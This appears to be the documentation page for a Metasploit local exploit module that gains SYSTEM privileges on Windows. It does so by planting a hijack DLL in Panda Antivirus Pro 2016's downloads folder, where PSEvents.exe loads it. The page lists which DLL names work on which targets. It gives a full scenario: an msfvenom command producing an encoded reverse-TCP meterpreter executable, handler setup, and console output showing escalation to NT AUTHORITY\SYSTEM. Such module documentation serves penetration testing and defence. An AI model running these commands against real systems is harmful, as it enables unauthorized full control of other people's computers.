## Vulnerable Application

  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).

  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught,
  so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.

  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.

  1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
  2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.

## Verification Steps

  1. Install the application
  2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
  3. Start msfconsole
  4. Get a shell
  5. Do: `use exploit/windows/local/panda_psevents`
  6. Do: `set session [ID]`
  7. Do: `exploit`
  8. Go do something else while you wait
  9. Enjoy being system with your shell

## Options

  **DLL**

  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.

|                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
| 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |

In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.

  **ListenerTimeout**

  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)

## Scenarios

### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2

  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.

    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
    
    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
    payload => windows/meterpreter_reverse_tcp
    msf exploit(handler) > set lhost 192.168.2.117
    lhost => 192.168.2.117
    msf exploit(handler) > set lport 4449
    lport => 4449
    msf exploit(handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4449 
    [*] Starting the payload handler...
    [*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
    
    meterpreter > getuid
    Server username: IE11Win8_1\IEUser
    meterpreter > background
    [*] Backgrounding session 1...

  Step 2, drop our panda exploit

    use exploit/windows/local/panda_psevents
    msf exploit(panda_psevents) > set session 1
    session => 1
    msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(panda_psevents) > set exitfunc seh
    exitfunc => seh
    msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
    DLL => CRYPTBASE.dll
    msf exploit(panda_psevents) > show options
    
    Module options (exploit/windows/local/panda_psevents):
    
       Name             Current Setting  Required  Description
       ----             ---------------  --------  -----------
       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
       ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
       SESSION          1                yes       The session to run this module on.
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.2.117    yes       The listen address
       LPORT     4450             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows x86
    
    
    
    msf exploit(panda_psevents) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4450 
    [*] Uploading the Payload DLL to the filesystem...
    [*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
    [*] Start Time: 2016-09-27 18:10:21 -0400
    [*] Sending stage (957999 bytes) to 192.168.2.91
    [*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
    [+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > sysinfo
    Computer        : IE11WIN8_1
    OS              : Windows 8.1 (Build 9600).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/win32
    meterpreter > background

## Failed Exploitation Attempts

If the dll doesn't work, PSEvents.exe will fail to run.  While silent to the user, an error will occur in the Application Windows Logs.

 * Event ID: 1000
 * Task Category (100)
 * Log Name: Application
 * Source: Application Error
 * Details:
```
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application start time: 0x01d218a30fbf1ac5
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name: 
Faulting package-relative application ID:
```
